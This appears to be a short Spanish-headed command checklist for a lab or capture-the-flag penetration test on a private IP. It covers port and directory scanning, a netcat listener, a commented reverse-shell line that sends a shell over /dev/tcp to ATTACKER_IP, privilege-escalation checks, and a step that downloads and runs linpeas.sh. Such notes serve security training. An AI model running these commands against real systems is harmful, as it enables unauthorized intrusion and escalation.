00:00–05:00 - Enumeración inicial
pwd
nmap -sC -sV -p- -T4 -oN nmap_full.txt 10.201.96.207
cat nmap_full.txt
gobuster dir -u http://10.201.96.207/ -w /usr/share/wordlists/dirb/common.txt -t 50
curl -I http://10.201.96.207/
whatweb http://10.201.96.207
nikto -host http://10.201.96.207 -o nikto.txt
searchsploit 
nc -nlvp 4444
# ejemplo PoC (ajustar según exploit):
# curl "http://10.201.96.207/ruta_vulnerable?cmd=... > /dev/tcp/ATTACKER_IP/4444 0>&1"
ssh usuario@10.201.96.207

whoami
id
uname -a
pwd
ls -la
find / -maxdepth 3 -type f -name "*root*" 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
sudo -l
wget https://example.com/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh
touch 
echo
